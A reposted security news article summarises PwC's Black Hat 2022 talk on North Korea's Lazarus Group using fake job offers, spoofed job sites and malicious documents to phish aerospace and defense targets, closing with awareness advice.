State-Sponsored APTs Dangle Job Opps to Lure In Spy Victims

APTs continue to exploit the dynamic job market and the persistent phenomenon of remote working, as explored by PwC at Black Hat USA.

Fake job offers have become a top phishing tactic for state-sponsored threat actors to lure in unsuspecting targets in the wake of the COVID-19 pandemic, as many reconsider their careers amid growing demand for skilled workers and managers.
The
cyber-threat analyst team at PwC
, which has followed a prime example of this (the
Lazarus Groups Operation In(ter)ception
) closely, presented a detailed account of the Lazarus campaign and how the group implemented the strategy during last weeks
Black Hat USA 2022 conference
in Las Vegas.
PwC principal threat analyst Sveva Vittoria Scenarelli, who studies advanced persistent threats (APTs) in the Asia-Pacific region with an emphasis on North Korea, noted that the stakes are high.
This is an espionage-motivated campaign that is incredibly persistent in targeting the aerospace sector, the defense industrial base, manufacturing chemical sector, for everything from military secrets to intellectual property to confidential information of strategic interest, Scenarelli explained during her presentation at Black Hat, called
Talent Need Not Apply: Tradecraft and Objectives of Job-themed APT Social Engineering
.
The Cybersecurity & Infrastructure Security Agency (CISA) agrees, and
has warned that the threat actors
(aka APT38, Black Artemis, BlueNoroff, Hidden Cobra, and Stardust Chollima) employ malicious cyberactivity to collect intelligence, conduct attacks, and generate revenue.
Scenarelli explained that Lazarus follows up with its targets via messaging apps such as WhatsApp.
This is to make sure that the victims do open the malicious viewer documents or the malicious executables that the threat actor has sent, she said. Black Artemis will also set up domains. This can be for command and control of its malicious implants to send emails that appear to come from on a legit site, or indeed to perform Web exploitation as an initial access method.
Scenarelli explained that Black Artemis creates domains that spoof prominent job search websites like Indeed, with attractive positions at high-profile companies such as Google and Oracle. She underscored that many sites look legitimate, though there are obvious signs they are fake. For instance, the Indeed decoy site URL is Indeed.US.org, she said. Scenarelli noted that the job descriptions disguised as .docx, .pdf, or .rtx files launch when the victims click on the documents, which may enable macros.
Similarly, Scenarelli recalled another attack by the group, which
made off with $625 million
in cryptocurrency. She warned that this variant, which PwC researchers call Black Alicanto, is financially motivated and dangerous. In the wake of Microsoft recently
disabling macros in Office documents
, Scenarelli said this malware might use .lnk files, perhaps embedded in password-protected Microsoft Word documents.
Threat actors are having to pivot a bit in their initial access techniques and using more and more .lnk files, ISO files, MSI installers, and stuff like that, she said. But in the background, she noted, the .lnk file is calling MSHDA.exe, which connects to a remote server to pull down a malicious JavaScript script that PwC calls Cabbage Loader.
This script places a .lnk file in the victims startup folder to ensure persistence and then pulls down a whole series of other JavaScript payloads, she explained. These are essentially profilers that want to make sure that the actual person thats interacting with them is not a sandbox, is not a researcher, but its actually a target of interest.
Scenarelli concluded that Lazarus and other North Korea-based threat actors continue to exploit the growing demand for skilled people, who, despite their training and awareness of threats, can be caught off guard.
The job market right now is a really key area for North Korea-based threat actors, she said. So, keep your eyes peeled, make sure youre aware of whom youre interviewing. And for the love of all that is holy, dont open those links that you get sent on LinkedIn, do not open them.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
State-Sponsored APTs Dangle Job Opps to Lure In Spy Victims